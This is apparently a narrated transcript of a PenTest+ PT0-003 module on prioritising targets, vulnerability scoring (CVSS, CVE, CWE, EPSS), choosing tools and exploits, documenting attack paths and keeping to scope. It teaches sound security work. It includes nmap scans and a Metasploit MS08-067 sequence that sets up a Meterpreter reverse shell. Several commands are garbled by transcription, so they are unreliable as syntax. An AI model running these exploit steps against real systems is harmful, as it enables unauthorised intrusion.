Now that we have introduced the scope and significance of attacks and exploits within the PenTest plus PT0-003 certification course, let's delve into the specifics. In this section, we will cover an overview of the various attack techniques and their importance in penetration testing. Understanding these techniques is crucial as it forms the foundation for all subsequent activities in a penetration test. Moving on to our next slide, we will discuss analyzing output to prioritize and prepare attacks. This part of the course will help you grasp how to effectively analyze outputs from tools and manual testing processes. The primary goals of this analysis phase are to prioritize targets and prepare for impactful attacks. We'll cover how to sift through data and identify the most critical vulnerabilities to exploit, ensuring that your approach is both strategic and efficient. In the last slide, we introduced the domain of attacks and exploits, highlighting the significance of understanding various attack techniques in the field of penetration testing. Now that we have a foundational understanding, let's dive into the critical phase of analyzing outputs, which is the focus of slide 2. Here, we will be overviewing the process of analyzing outputs to prioritize and prepare our attacks effectively. This analysis phase is crucial as it enables penetration testers to make informed decisions based on the collected data. The goals of this phase include identifying vulnerabilities, assessing the potential impact on the target, and determining the most efficient attack vectors. By systematically analyzing the output from our reconnaissance and scanning activities, we can create a structured approach to our attack plans, ensuring that we target the most critical vulnerabilities first. This method enhances the efficiency and effectiveness of our penetration testing engagements. In the next slide, we will delve into target prioritization, discussing the importance of identifying and focusing on high-value assets within the target environment. We will also look at practical techniques such as using Nmap to identify high-value targets by running a simple command, nmap-sp192.168.8.1.0/24. This structured approach not only helps in efficiently executing our tasks, but also ensures that we address the most significant security threats to our client's environment. On the previous slide, we explored the importance of analyzing outputs and the goals of the analysis phase. Now let's move on to target prioritization. In this stage, it's crucial to understand the importance of prioritizing targets effectively. This process helps us identify high-value assets that are more likely to yield significant results when attacked. By focusing on these assets, we can maximize our resources and efforts to achieve the best outcomes. There are several techniques for identifying high-value assets. One common method is to use tools like Nmap, which can help us scan and enumerate the network to find potential targets. For instance, using the command nmap sp192.168.1.0/24 can help us identify which devices are active within a specific subnet and ascertain their importance. In the upcoming slide, we'll delve deeper into what constitutes a high-value asset and provide more examples and techniques for effectively identifying them within an organization. This understanding will better equip us in the stages of planning and executing attacks. Moving on from our discussion on target prioritization, let's delve deeper into high-value asset identification. On this slide, we're defining what high-value assets are. High-value assets in an organization are those critical components whose compromise would have significant repercussions on the business. This could include anything from customer databases, critical servers, proprietary software applications, to important personnel workstations. Understanding and identifying high-value assets is crucial because it helps us focus our efforts where they matter most. Now, let's look at some examples of what high-value assets might look like in various organizations. These can be intellectual property, financial records, or even human assets like key personnel. To identify these high-value assets, we rely on several techniques. These might include vulnerability scanning tools, asset management databases, interviews with key stakeholders to understand the criticality of different systems, or even using penetration testing tools to map out the most valuable targets, such as what we previously discussed with the Nmap example. In the next slide, we're going to explore how descriptors and metrics can aid us in the prioritization process. Stay tuned as we discuss the importance of these elements and look at common descriptors and metrics used in penetration testing. In the previous slide, we covered the identification of high-value assets within an organization, their definitions, examples, and techniques to discern these critical components. Now let's move on to understanding descriptors and metrics, which are integral in the prioritization process. Descriptors and metrics play a crucial role in prioritizing penetration testing efforts. They help us quantify and categorize the importance and impact of various assets and vulnerabilities. Descriptors give us qualitative data, such as asset type or location, while metrics provide quantitative measures like frequency of access or potential risk. Common descriptors include categories like asset classification or business impact, while metrics could encompass factors such as likelihood of compromise, exploitability, or the asset's role in the organization. By effectively utilizing these descriptors and metrics, we can better prioritize our assessments and remediation efforts, ensuring we focus on the most critical areas first. Next, we will delve into the Common Vulnerability Scoring System, also known as CVSS. This system provides a standardized method for evaluating and scoring the severity of vulnerabilities, helping us prioritize them systematically. We'll also look at how a CVSS base score is calculated and go through an example using the CVSS calculator to demonstrate its application. On this slide, we are delving into the Common Vulnerability Scoring System, or CVSS. The objective here is to understand how vulnerabilities are quantified and prioritized using this widely adopted framework. First, let's get an overview of CVSS. CVSS is a standardized method for rating the severity of security vulnerabilities. It provides a numerical score that reflects the risk level of a vulnerability, which helps organizations prioritize their response. Next, we'll look at how the CVSS base score is calculated. The base score takes into account several factors, such as the exploitability of the vulnerability and the impact on confidentiality, integrity, and availability of the affected system. These metrics are combined to produce a score that ranges from 0 to 10, with 10 being the most severe. To help make this more concrete, we'll go through an example of using CVSS to prioritize vulnerabilities. Suppose we have multiple vulnerabilities identified in an environment. By calculating their CVSS base scores, we can easily compare them and decide which ones to address first based on their risk levels. Finally, we'll discuss the CVSS calculator, a handy online tool that automates the score calculation process. This tool allows you to input the relevant metrics and quickly generate a CVSS score, making your vulnerability management workflow more efficient. In the next slide, we will focus on the Common Vulnerabilities and Exposures (CVE) system, looking into its importance in vulnerability management and how to leverage it for effective security analysis. We'll also demonstrate searching for CVE information using tools like SearchSploit, specifically for vulnerabilities like Heartbleed. Continuing from our discussion on CVSS in the previous slide, let's now dive into the Common Vulnerabilities and Exposures, or CVE system. CVE is a catalog of known vulnerabilities, each identified by a unique identifier. It's pushed forward by MITRE and is integral in the ecosystem of vulnerability management. The importance of CVE lies in its role as a uniform and often referenced source for identifying vulnerabilities. Its standardized format helps ensure that security professionals are speaking the same language across the board. One key aspect of utilizing CVE is searching for specific vulnerabilities. For instance, to gather detailed information about the infamous Heartbleed vulnerability, we can use a tool like SearchSploit. By running the command searchsploit-to-Heartbleed, we can efficiently retrieve all relevant data associated with that CVE entry. This allows for quicker assessment and prioritization of threat mitigation strategies. With this understanding of how CVE plays a pivotal role in our vulnerability management processes, let's transition to our next topic, Common Weakness Enumeration, or CWE. Here, we'll look at how CWE helps us understand software weaknesses and categorize vulnerabilities. Continuing from our discussion on Common Vulnerabilities and Exposures, CVE, let's now examine another essential framework, the Common Weakness Enumeration, or CWE. This slide provides an overview of CWE. Similar to CVE, but instead of focusing on specific vulnerabilities, CWE categorizes software weaknesses. Understanding these categories is crucial because it allows organizations to identify common patterns and root causes behind vulnerabilities, which are often recurring issues in software development. Why is CWE important? Firstly, it provides a standardized classification system for software weaknesses, making it easier to communicate about and understand the nature of these issues. Secondly, by identifying and categorizing weaknesses, CWE helps in designing more robust security measures and can guide developers in writing more secure code from the onset. For instance, using CWE to categorize vulnerabilities involves mapping a known vulnerability to its corresponding weaknesses in the CWE database. This categorization helps in understanding not only how the vulnerability operates, but also its underlying flaws. In the next slide, we will discuss the Exploit Prediction Scoring System, EPSS, which builds on CVE and CWE data to help predict the likelihood of a vulnerability being exploited. This can be incredibly useful for prioritizing which vulnerabilities need immediate attention, especially when dealing with a large number of potential security threats. Let's move on to explore EPSS in more detail. On this slide, we're going to shift our focus from the common weakness enumeration to the Exploit Prediction Scoring System, EPSS. EPSS is a framework designed to help security professionals predict the likelihood of vulnerabilities being exploited in the wild. By understanding the exploitability of vulnerabilities, organizations can better prioritize their remediation efforts. Firstly, let's look at an overview of EPSS. The system uses historical data, machine learning, and other factors to generate a score that estimates the probability of a particular vulnerability being exploited within the next 30 days. These scores range from 0 to 1, with higher scores indicating a greater likelihood of exploitation. An important benefit of EPSS is that it aids in prioritizing vulnerabilities. For instance, in a typical organization, there might be thousands of vulnerabilities to assess. EPSS can help security teams focus on the vulnerabilities that are most likely to be exploited, thus optimizing their resources and efforts. To put this into context, imagine you're managing a large environment with numerous vulnerabilities identified through regular scanning. Instead of treating each vulnerability with equal urgency, you can use EPSS scores to direct your team's focus towards addressing those vulnerabilities with higher exploit probabilities first, thereby reducing potential risks more efficiently. This flow naturally leads us to our next slide, which will discuss the risks associated with end-of-life software and systems, techniques for identifying them, and the utility of tools like Nmap for such purposes. Now that we have an understanding of the Exploit Prediction Scoring System, EPSS, and how it can be utilized to prioritize vulnerabilities, let's move on to a critical aspect of cybersecurity: end-of-life software systems. When software systems reach their end of life, they no longer receive support or security updates from the vendor. This lack of updates poses significant risks, as any discovered vulnerabilities will remain unpatched, making these systems a prime target for attackers. To mitigate these risks, it is crucial to identify end-of-life software within your network. One effective technique is using specialized tools like Nmap with the vulners script. For instance, you can run the following command: nmap-sv-script vulners 192.168.1.0/24. This will scan your network to detect outdated software versions, making it easier to identify and address potential security risks. On the next slide, we'll explore the challenges associated with default configurations, along with methods for identifying and rectifying default settings in web applications and other systems. This will further help in fortifying our security posture against common vulnerabilities. In the previous slide, we covered the risks associated with end-of-life software and systems, discussed techniques for identifying such software using tools like Nmap, and demonstrated how to use the Nmap command map-sv script vulners 192.168.1.24 to detect outdated software versions. Now moving on to slide 11, we'll explore the concept of default configurations. Default configurations in software and systems often pose security risks because they can be easily exploited by attackers who are well aware of these default settings. To mitigate such risks, it is crucial to identify and reconfigure default settings in your systems. One common technique is to perform thorough security audits, which can help pinpoint default configurations that need to be altered. For example, in web applications, default passwords, default ports, and predefined user roles often present vulnerabilities. By systematically checking for these configurations, you can significantly enhance your system's security posture. Next, we will delve into running services in Slide 12. This will touch upon the importance of identifying running services and the techniques for doing so, including an example involving the use of Nmap. Stay tuned for more on that in the next slide. Slide 12. Running services. Understanding and managing the services running on your network is crucial for maintaining a secure environment. Running services, if not properly monitored, can become entry points for attackers. Firstly, the importance of identifying running services cannot be overstated. Determining what services are active helps in recognizing unnecessary or potentially harmful services that could be targeted by malicious actors. Next, we will discuss techniques for identifying these running services. One powerful tool we can use is Nmap. Nmap, or Network Mapper, is a free and open source utility used for network discovery and security auditing. Using the Nmap command shown here, nmap-sv192.168.1.024, we can scan a network range to identify which services are running on the devices within that range. The -sv option is used to detect service versions, providing more detailed information about what exactly is running on each port. In the next slide, we'll delve into vulnerable encryption methods, examining the risks and techniques to identify weaknesses in encryption protocols. We'll also demonstrate the use of SSLIs to check for weak encryption. Now that we've discussed how to identify running services using tools like Nmap, let's shift our focus to encryption methods. Encryption is a critical aspect of cybersecurity, but not all encryption methods are created equal. On this slide, we'll delve into vulnerable encryption methods. First, we'll explore the risks associated with using vulnerable encryption techniques. Weak or outdated encryption can expose sensitive data to interception and decryption by malicious actors, potentially leading to data breaches or other security incidents. Next, we'll cover various techniques for identifying these weak encryption methods. One effective tool for this purpose is SSLIs, a fast and accurate SSL configuration analyzer. With SSLIs, you can quickly assess a server's SSL/TLS configuration for common vulnerabilities. For example, you can use the following command to analyze a website like example.com for weak encryption. Bash SSLIZ regular example.com. This command will generate a detailed report on the encryption strength and potential weaknesses of the target server. In the next slide, we will discuss defensive capabilities, understanding their importance, and various techniques for identifying and analyzing them. We'll also see how a SIEM tool can be employed to evaluate these defensive measures effectively. Let's move forward to better understand the integral role of defensive capabilities in overall cybersecurity. In the previous slide, we discussed the risks associated with vulnerable encryption methods and techniques for identifying these vulnerabilities, such as using tools like SSLIs to check for weak encryption. Now, let's shift our focus to defensive capabilities. Understanding defensive capabilities is crucial in the context of cybersecurity. It's not only about knowing the vulnerabilities, but also about being aware of the defenses that are in place. To effectively identify defensive measures, various techniques can be employed. One of the key tools in this process is a Security Information and Event Management (SIEM) system. SIEM tools help analyze and understand the existing defensive measures within a network, allowing for a comprehensive assessment of the security posture. For example, utilizing a SIEM tool can provide critical insights into how an organization is protecting against potential attacks. By analyzing data from multiple sources, SIEM tools can help identify patterns and anomalies that signify defensive strengths and weaknesses. In the next slide, we'll delve into the importance of selecting the right capabilities for an attack and the techniques for choosing the appropriate tools and exploits. To effectively conduct an attack, selecting the right capabilities is crucial. This not only ensures the success of the attack, but also helps in executing it efficiently and effectively. When we talk about capability selection, we're referring to the process of choosing the appropriate tools and exploits that align with your attack objectives. This involves understanding the environment you're targeting, the potential vulnerabilities that exist, and the defenses in place. Techniques for selecting these tools and exploits can vary, but typically involve a detailed assessment of the target system's architecture, software, and any known vulnerabilities. This can also include a review of past penetration test reports or vulnerability scans to pinpoint common weaknesses. On the next slide, we will dive into the specifics of tool selection, where we will discuss factors to consider when selecting tools and highlight some of the common tools used in penetration testing, like Metasploit for exploit selection. This will give you a deeper understanding of how to effectively choose and utilize the right tools for your penetration testing efforts. Now that we've discussed the importance of selecting the right capabilities for an attack, let's move on to the crucial aspect of tool selection. Slide 16 in our presentation. Here we'll focus on several factors to consider when selecting tools for penetration testing. These factors include compatibility with the target system, user expertise, ease of use, and the specific requirements of the engagement. For instance, a popular and powerful tool commonly used in penetration testing is Metasploit. Metasploit allows penetration testers to utilize a wide range of exploits efficiently. An example of its use would be if you're targeting an exploit, Metasploit can help you find and select the right one for your penetration testing scenario. In our next slide, we'll delve deeper into exploit selection and customization, highlighting their importance and providing examples of how to tailor exploits to fit specific needs, such as in Metasploit. For now, keep in mind that choosing the right tools is a critical step in ensuring the success of your penetration testing efforts. In the previous slide, we discussed the factors to consider when selecting tools for penetration testing and introduced some common tools used, including Metasploit for exploit selection. Now, let's delve deeper into the process of exploit selection and customization. Slide 17 focuses on the importance of selecting and customizing exploits. It's crucial to select the right exploit to match the vulnerabilities identified in the target system. Moreover, customizing exploits can often be necessary to bypass specific security measures or to fit the particular environment of your target. Customizing exploits may involve adjusting payloads, changing target addresses, or modifying attack vectors to increase the chances of successful penetration. For instance, let's look at how we can customize an exploit within Metasploit. Here's a practical example. 1. First, we choose an exploit, such as useExploit Windows/SMB MS08067 Netapi. This is a known vulnerability in Windows systems. 2. Next, we set the target host using set roast 192.168.1.5. 3. Then define the payload, which in this case is set payload Windows/meterpreter reverse TCP. 4. Following that, we configure the local host to receive the connection using set lhost 192.168.1.10. Finally, we launch the exploit with the exploit command. This customization ensures that the exploit is tailored to the specific target and configured to successfully create a reverse TCP shell back to our machine. Understanding and customizing exploits can significantly enhance the effectiveness of your penetration tests, ultimately providing more accurate and insightful results. Next, we'll move on to slide 18, where we'll discuss the importance of code analysis in exploit development, including techniques for analyzing exploit code using a Python-based example. Now that we've discussed the importance of exploit selection and customization, as well as provided an example using Metasploit, let's move on to another crucial aspect of exploit development: code analysis. In slide 18, we focus on the significance of code analysis in exploit development. Analyzing the code behind an exploit is not only essential for understanding how it operates, but also for ensuring that it behaves as expected in your specific test environment. This step can help identify potential issues or opportunities for customization to better suit your needs. There are several techniques for analyzing exploit code. You might review the code structure, look for any hard-coded values that need to be adjusted for your target environment, or assess the logic flow to understand how it executes its payload. By diving deep into the exploit code, you'll gain insights that can lead to more effective and efficient penetration testing. For example, If you're working with an exploit written in Python, you'd start by reviewing the exploit code itself. Look for key parts of the code that initialize the attack vector and deliver the payload. Understanding this can help you tweak the exploit for different scenarios or targets. In our next slide, we will focus on the importance of documentation within penetration testing. This includes techniques for documenting your attack paths and findings, which is foundational for creating thorough and professional penetration test reports. On this slide, we're shifting our focus to the critical aspect of documentation in penetration testing. In the field of penetration testing, effective documentation is paramount. It ensures that you can clearly communicate the vulnerabilities and the attack paths discovered, which is vital for the remediation process. Documentation also provides a comprehensive record that can be reviewed and analyzed later, which is invaluable for improving security measures over time. Several techniques can help you document attack paths and findings efficiently. Using detailed notes, structured reports, and visual aids like diagrams can simplify complex information for various stakeholders, including those who may not have a technical background. Additionally, keeping a chronological account of your activities helps in retracing steps and understanding the impact of each action taken during the penetration testing process. As we move to the next slide, we'll delve deeper into the concept of an attack path. We'll define what an attack path is and explore various techniques for creating and documenting these paths effectively. An example using a diagram will be provided to illustrate how an attack path can be visually represented. Stay tuned for more practical insights on capturing and communicating your findings comprehensively. As we move from the broad importance of documentation and penetration testing to focusing specifically on attack paths, it's crucial to understand what an attack path is. An attack path is essentially a sequence of actions or steps that an attacker takes to compromise a target system or network. Identifying and documenting these paths is a fundamental part of penetration testing, as it provides a clear roadmap of potential vulnerabilities and the methods used to exploit them. There are several techniques for creating and documenting these attack paths. One effective method is through the use of diagrams. Diagrams can visually represent the path taken by an attacker and highlight key stages such as initial access, privilege escalation, lateral movement, and data exfiltration. This not only helps in better understanding, but also in communicating the findings to stakeholders who may not have a deep technical background. For instance, using tools like draw.io, we can create detailed diagrams that outline each step of the attack path. Visual aids can be extremely helpful in clearly conveying the complexity and potential impact of the vulnerabilities discovered during the test. In the next slide, we will delve deeper into the significance of low-level diagrams for documenting attacks, and I'll provide an example of how to create one with a hands-on demonstration using draw.io. To continue from our previous discussion on attack paths, let's move on to the importance of low-level diagram creation in documenting attacks. Low-level diagrams are crucial because they provide a detailed visualization of the attack procedure, highlighting individual steps and the flow of actions. This granularity helps in understanding specific vulnerabilities and how an attacker can exploit them. When creating these diagrams, techniques such as breaking down the attack into minute, actionable steps are vital. You should include key elements like entry points, tools used, commands executed, and the progression from one step to the next. For an effective example, we can use draw.io, a popular diagramming tool. Draw.io allows you to create detailed, visually appealing diagrams that can be easily shared and understood by various stakeholders. In our next slide, we'll discuss how to create a storyboard, which is another valuable tool in penetration testing. Now that we've discussed the importance of low-level diagrams and how to create them, let's transition to another crucial documentation tool, the storyboard. On this slide, we'll dive into what a storyboard is and why it's essential in penetration testing. A storyboard, in essence, is a visual representation of the attack narrative. It outlines the sequence of events, illustrating how the attack progresses step by step. This visual tool is invaluable for simplifying complex attack scenarios and making them more digestible for stakeholders. We'll look into various techniques for creating an effective storyboard ensuring that each phase of the attack is clearly depicted. As part of this, we'll explore how to structure your storyboard to make sure it captures all necessary details without becoming overly complicated. Finally, we'll provide a concrete example of a storyboard created for a simulated attack. This example will give you a clear idea of how to apply the techniques discussed and what a well-constructed storyboard should look like. In the upcoming slide, we'll move on to discussing dependencies, their importance in understanding attacks, and how to properly identify and document them. On this slide, we will discuss the importance of understanding dependencies in penetration testing. Dependencies are crucial because they help us identify the various interconnected elements within a system that might be leveraged during an attack. To effectively document these dependencies, we need to employ specific techniques. For instance, we might start with a thorough system analysis to map out the relationships between different components. Another method includes using threat modeling tools that help visualize these dependencies. Documenting them meticulously ensures that no critical linkage in the attack chain is overlooked. Understanding and documenting these dependencies not only enhances our testing methodology, but also prepares us to anticipate potential weak points in a system's defenses. Moving forward, in the next slide, we will cover the importance of scope limitations in penetration testing and techniques for adhering to these limitations, along with examples to illustrate these concepts. Understanding and adhering to scope limitations is equally critical in the process of conducting penetration testing. On this slide, we will delve into the importance of these limitations and the techniques to maintain adherence. First and foremost, recognizing the importance of scope limitations ensures that the engagement stays within predefined boundaries. This is crucial for both ethical and legal reasons, as deviating outside the agreed scope could lead to unintended consequences, including legal ramifications and potential harm to the client's assets. To effectively adhere to these scope limitations, several techniques should be employed. One key technique is meticulous documentation. Prior to initiating any testing activities, thoroughly review the scope document. This review process should clearly define what systems, applications, and networks are included and explicitly state what is out of bounds. This will help in avoiding any accidental breaches of the agreement. Another technique involves maintaining open communication channels with the client throughout the engagement. Regular status updates and checkpoints can ensure continuous alignment with the defined scope, allowing for immediate adjustments if there are any ambiguities or changes required. Now, let's move on to some practical implementation. For example, before starting an engagement, take the time to go through the scope document meticulously. This step cannot be overemphasized as it sets the foundation for a compliant and effective penetration test. In the next slide, we'll discuss the importance of labeling sensitive systems, including techniques and examples of how to effectively identify and label such systems, particularly in environments like the cloud. In this slide, we'll delve into the critical task of labeling sensitive systems. This is an essential practice to ensure that those conducting the penetration test are fully aware of all systems that require extra caution. First and foremost, understanding the importance of labeling sensitive systems cannot be overstated. This process helps in preventing unintended disruptions to crucial services, avoiding data breaches, and maintaining compliance with regulatory requirements. It also ensures that these systems receive the highest level of scrutiny and protection during the testing process. Now let's talk about techniques for identifying and labeling these systems. One effective method is to utilize tags, especially in cloud environments where resources can be dynamically allocated. Tags or labels can quickly provide information about the system's purpose, the sensitivity level, and any specific considerations that need to be kept in mind. As an example, in a cloud environment, you can use tags to label systems that handle sensitive data, such as customer information or financial records. These tags can help testers immediately identify which systems require additional care and detailed reporting. By labeling sensitive systems appropriately, we ensure a higher level of organization and risk management during penetration tests. Now, let's move on to the conclusion and review in the next slide, where we'll summarize key attack preparation techniques and discuss the importance of thorough preparation in ensuring the success of penetration testing. Slide 26, Conclusion and Review. In the previous slides, we've discussed the importance of labeling sensitive systems and explored various techniques for identifying and labeling these systems. For example, using tags in a cloud environment can help us effectively manage and secure our sensitive systems. Now, let's conclude and review the main points we've covered in this module. Firstly, we summarized various attack preparation techniques. Thorough preparation is crucial for successful penetration testing. This includes understanding the target environment, identifying vulnerabilities, and effectively labeling sensitive systems for better management. As you move forward, remember that meticulous preparation is key to effective penetration testing. Ensure you keep refining your methods and stay updated with the latest tools and techniques. For the next steps, consider exploring further learning resources and advanced topics in penetration testing to enhance your skills. Thank you for completing this module, and I encourage you to apply these techniques in your real-world scenarios for better security management.